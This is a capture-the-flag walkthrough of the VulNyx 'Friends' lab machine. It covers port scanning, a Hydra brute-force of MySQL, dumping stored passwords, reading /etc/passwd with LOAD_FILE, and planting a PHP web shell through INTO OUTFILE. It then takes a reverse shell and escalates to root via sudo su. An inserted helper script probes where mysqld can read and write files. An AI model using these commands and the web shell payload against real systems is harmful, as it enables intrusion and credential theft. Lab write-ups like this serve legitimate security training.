VulNyx | Friends (Walkthrough)

d4t4s3c
5 min read · Feb 20, 2024

Friends is an easy Linux machine on the VulNyx platform, created by d4t4s3c, and it runs correctly in VirtualBox.

Skills:

  • OSINT
  • Brute Force (MySQL)
  • MySQL (LOAD_FILE & INTO OUTFILE)
  • Privilege Escalation (su)

Nmap

❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.92

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 09:30 CET
Nmap scan report for 192.168.1.92
Host is up (0.000079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql

❯ nmap -n -Pn -sVC -p22,80,3306 192.168.1.92

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 09:31 CET
Nmap scan report for 192.168.1.92
Host is up (0.00057s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Friends
3306/tcp open mysql MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
| Thread ID: 7
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolNew, LongColumnFlag, Support41Auth, Speaks41ProtocolOld, InteractiveClient, SupportsTransactions, FoundRows, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, ConnectWithDatabase, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 9:U!AcPGP>$8/~PT6Qts
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:97:ED:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

22   ssh    OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80   http   Apache httpd 2.4.56 ((Debian))
3306 mysql  MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2

Port: 80 (HTTP)

I fuzz for possible paths and files, without success…

❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.92/' -x 'php,txt,html'

/index.php (Status: 200) [Size: 269]

Port: 3306 (MySQL)

With candidate usernames in hand from the OSINT step, I try to obtain a password by brute force.

Brute Force (Password)

❯ hydra -t 64 -l beavis -P /opt/techyou.txt mysql://192.168.1.92 -F -I

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-20 09:48:06
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10001 login tries (l:1/p:10001), ~2501 tries per task
[DATA] attacking mysql://192.168.1.92:3306/
[3306][mysql] host: 192.168.1.92 login: beavis password: rocknroll
[STATUS] attack finished for 192.168.1.92 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-20 09:48:18

rocknroll

I log into MySQL with the credentials I obtained and dump the database:

❯ mysql -h 192.168.1.92 -u beavis --password="rocknroll"

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| friends |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0,010 sec)

MariaDB [(none)]> use friends;

MariaDB [friends]> show tables;
+-------------------+
| Tables_in_friends |
+-------------------+
| users |
+-------------------+
1 row in set (0,001 sec)

MariaDB [friends]> select * from users;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| 1 | beavis | b3@v1$123 |
| 2 | butthead | BuTTh3@D! |
+------+----------+-----------+
2 rows in set (0,007 sec)

beavis:b3@v1$123
butthead:BuTTh3@D!

Using INTO OUTFILE I try to write PHP code from MySQL into /var/www/html, but I don't have permission to do so. Errcode 13 is the operating system's EACCES: the mysqld process, running as the mysql user, cannot write to that directory. It is not a secure_file_priv restriction, which MariaDB would report as ERROR 1290 instead.

MariaDB [friends]> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/cmd.php' (Errcode: 13 "Permission denied")

Next I use the LOAD_FILE function to read local files (like INTO OUTFILE it needs the FILE privilege, so this account clearly has it). I manage to read /etc/passwd:

MariaDB [friends]> SELECT LOAD_FILE('/etc/passwd');
+---------------------------------------------------------------------------------------+
| LOAD_FILE('/etc/passwd')
+---------------------------------------------------------------------------------------+
| root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
beavis:x:1000:1000::/home/beavis:/bin/bash
butthead:x:1001:1001::/home/butthead:/bin/bash
|
+---------------------------------------------------------------------------------------+
1 row in set (0,001 sec)

I tried to read the id_rsa of both users, without success. LOAD_FILE returns NULL both when the file does not exist and when the mysql user cannot read it (a 0700 ~/.ssh is enough), so the NULL alone does not say which it was.

During the initial fuzzing I noticed the index was an index.php rather than an index.html, so I decided to read its source.

MariaDB [friends]> SELECT LOAD_FILE('/var/www/html/index.php');
+-----------------------------------------------------------------------------+
| LOAD_FILE('/var/www/html/index.php')
+-----------------------------------------------------------------------------+
|

<?php

/*
print "For more Rock & Roll visit: /M3t4LL1c@ ";
*/

?>
<html>
<head>
<title>Friends</title>
<style>
body {
background-color: #83cbc7;
}

img {
border-radius: 10px;
}
</style>
</head>
<body>
<center>
<img src="image.jpg" style="width: 1880px; height: 900px;">
</center>
</body>
<html>
|
+-----------------------------------------------------------------------------+
1 row in set (0,001 sec)

In a PHP comment I found a new path, /M3t4LL1c@.

I retry INTO OUTFILE to see whether the mysql user has write permission in the new path, and this time the PHP code lands there. Note that INTO OUTFILE refuses to overwrite an existing file (ERROR 1086), so the filename must not exist yet.

MariaDB [friends]> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/M3t4LL1c@/cmd.php";
Query OK, 1 row affected (0,001 sec)
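The INTO OUTFILE failure on /var/www/html, the id_rsa reads that came back NULL, and the write that finally succeeded under /M3t4LL1c@ are all the same question: what can the mysqld process read and write on disk? The following shell helper is an added example, not part of the original walkthrough, that asks that question up front with the mysql client. It prints secure_file_priv and the account's grants, probes a list of files with LOAD_FILE (my own list; the page only reads /etc/passwd, the two id_rsa files and index.php), and drops a harmless marker file into candidate web directories to see where a write would succeed, classifying any error by the layer that blocked it. Host and credentials default to the ones recovered above; the error numbers are MariaDB's documented ones.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: check up front what
# the FILE privilege lets this account read and write through mysqld.
# Assumptions: a local mysql/mariadb client; host and credentials default
# to the ones recovered on the page; the probe lists are my own choice.
set -eu

DB_HOST="${DB_HOST:-192.168.1.92}"
DB_USER="${DB_USER:-beavis}"
DB_PASS="${DB_PASS:-rocknroll}"

# Quote a value as a SQL string literal. Backslash is an escape character
# in MariaDB strings under the default sql_mode, so it is doubled as well.
sql_str() {
  printf "'%s'" "$(printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e "s/'/\\\\'/g")"
}

load_file_sql() {
  printf 'SELECT LOAD_FILE(%s);' "$(sql_str "$1")"
}

# INTO OUTFILE never overwrites (ERROR 1086), so the path must be new.
outfile_sql() {
  printf 'SELECT %s INTO OUTFILE %s;' "$(sql_str "$1")" "$(sql_str "$2")"
}

# Map the client's response to an INTO OUTFILE attempt onto the layer that
# blocked it. Only Errcode 13, the page's case, is a filesystem problem:
# the mysqld OS user has no write access to that directory.
classify_outfile_error() {
  case "$1" in
    *"ERROR 1290"*)  echo secure_file_priv ;;     # server restricts file paths
    *"ERROR 1045"*)  echo no_file_privilege ;;    # account lacks FILE
    *"ERROR 1086"*)  echo file_exists ;;          # target already present
    *"Errcode: 13"*) echo fs_permission_denied ;; # EACCES for the mysql user
    "")              echo written ;;              # batch mode prints nothing on success
    *)               echo unknown ;;
  esac
}

# Run one statement non-interactively: raw tab-separated rows, no header,
# errors folded into the output so the caller can classify them.
q() {
  mysql -h "$DB_HOST" -u "$DB_USER" --password="$DB_PASS" -N -B -r -e "$1" 2>&1 || true
}

main() {
  echo "[*] secure_file_priv (empty = unrestricted, otherwise the only directory allowed):"
  q "SHOW VARIABLES LIKE 'secure_file_priv';"
  echo "[*] grants of this account (look for FILE or ALL PRIVILEGES):"
  q "SHOW GRANTS FOR CURRENT_USER();"

  # LOAD_FILE returns NULL for a file that is missing, unreadable by the
  # mysqld user, or larger than max_allowed_packet; NULL alone does not
  # say which, so a NULL for id_rsa is not proof the key is absent.
  for f in /etc/passwd /home/beavis/.ssh/id_rsa /home/butthead/.ssh/id_rsa \
           /var/www/html/index.php /etc/apache2/sites-enabled/000-default.conf; do
    out=$(q "$(load_file_sql "$f")")
    if [ "$out" = NULL ]; then
      echo "[*] LOAD_FILE $f -> NULL (absent or unreadable)"
    else
      echo "[*] LOAD_FILE $f -> ${#out} bytes"
    fi
  done

  # Probe candidate web directories with a harmless marker file rather than
  # a web shell, so the check leaves nothing executable behind.
  for d in /var/www/html "/var/www/html/M3t4LL1c@"; do
    out=$(q "$(outfile_sql probe "$d/.probe_$$.txt")")
    echo "[*] INTO OUTFILE $d -> $(classify_outfile_error "$out")"
  done
}

if [ "${1:-}" = run ]; then main; fi
```

Save it as, for example, probe.sh and run `sh probe.sh run`; the directory reported as `written` is where a web shell can be dropped, and the marker file it leaves can be removed from the shell afterwards.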

With the web shell in place I can run commands as www-data. From there I launch a reverse shell toward a listener on my machine and get a shell as www-data:

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.92] 46368
id;hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
friends

User Pivoting (www-data > butthead)

I become butthead by reusing the credentials obtained earlier from the database: the password stored in the users table is also butthead's system password.

www-data@friends:/$ su - butthead
Password:
butthead@friends:~$ id
uid=1001(butthead) gid=1001(butthead) grupos=1001(butthead)

Privilege Escalation

butthead can run the su binary as root through sudo; the PASSWD tag means sudo asks for butthead's own password, which I already have:

butthead@friends:~$ sudo -l
[sudo] password for butthead:
Matching Defaults entries for butthead on friends:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User butthead may run the following commands on friends:
(root) PASSWD: /usr/bin/su

I become root by abusing that privilege: sudo runs su as uid 0, and su does not ask root for a password when switching user, so it drops straight into a root shell:

butthead@friends:~$ sudo -u root /usr/bin/su -
root@friends:~# id
uid=0(root) gid=0(root) grupos=0(root)

Now as root I can read both flags, user.txt and root.txt:

root@friends:~# find / -name user.txt -o -name root.txt |xargs cat
59cefd065***********************
df81a6fd6***********************

That's all for the Friends machine.

Happy Hacking!
